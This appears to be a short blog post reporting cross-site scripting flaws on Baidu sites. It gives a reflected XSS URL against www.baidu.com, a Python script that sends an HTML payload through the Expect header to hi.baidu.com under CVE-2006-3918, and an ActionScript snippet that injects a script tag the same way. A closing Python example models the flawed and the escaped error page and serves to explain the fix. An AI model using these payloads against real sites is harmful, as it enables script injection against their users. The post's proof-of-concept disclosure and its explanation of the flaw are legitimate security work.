Nov 14
1. Filler post
- http://www.baidu.com/index.php?tn="><script>alert('xxs')</script>
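2. hi.baidu.com XSS

```python
#!/usr/bin/env python3
# Sends a GET request to hi.baidu.com with HTML markup in the Expect header.
from http.client import HTTPConnection

conn = HTTPConnection('hi.baidu.com', 80)
# skip_host=True: the Host header is set explicitly below, so avoid a duplicate.
conn.putrequest('GET', '/', skip_host=True)
conn.putheader('Host', 'hi.baidu.com')
conn.putheader('Content-Type', 'text/xml; charset="utf-8"')
# The unsupported Expect value is what the server reflects in its error page.
conn.putheader('Expect', '<body onload=window.open("http://www.google.com")>')
conn.endheaders()
r = conn.getresponse()
print(r.read().decode('utf-8', errors='replace'))
```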
The vulnerability exploited is CVE-2006-3918:
http://www.securityfocus.com/bid/19661
A crafted SWF can be used to exploit this vulnerability:

```actionscript
var req:LoadVars = new LoadVars();
req.addRequestHeader("Expect",
    "<script>alert('gotcha!')</script>");
req.send("http://www.target.site/", "_blank", "GET");
```
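Both proofs of concept above depend on the server copying an unsupported Expect header into its error page without HTML-escaping it. The following Python is an added example, not code from the original post or from Apache: it models that 417 error page with the unescaped rendering beside the escaped one. The function names and the error-page wording are hypothetical.

```python
import html

# "100-continue" is the only expectation HTTP/1.1 defines; others get a 417.
KNOWN_EXPECTATIONS = {"100-continue"}

# Constructed sample: the header value used in the SWF snippet on this page.
SAMPLE_EXPECT = "<script>alert('gotcha!')</script>"

PAGE = ("<html><body><h1>417 Expectation Failed</h1>"
        "<p>Unsupported Expect header: {value}</p></body></html>")


def render_417_unescaped(expect_value):
    """Flawed behaviour: the header value is copied into the HTML as-is."""
    return PAGE.format(value=expect_value)


def render_417_escaped(expect_value):
    """Corrected behaviour: the value is HTML-escaped before being echoed."""
    return PAGE.format(value=html.escape(expect_value, quote=True))


def get_header(headers, name):
    """Case-insensitive header lookup; returns None when absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def handle_expect(headers, render):
    """Return (status, body) for the Expect handling of one request."""
    value = get_header(headers, "Expect")
    if value is None or value.strip().lower() in KNOWN_EXPECTATIONS:
        return 200, ""
    return 417, render(value)


if __name__ == "__main__":
    for render in (render_417_unescaped, render_417_escaped):
        status, body = handle_expect({"Expect": SAMPLE_EXPECT}, render)
        print(render.__name__, status, body)
```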
BTW: the WordPress post editor here is also affected by XSS -__-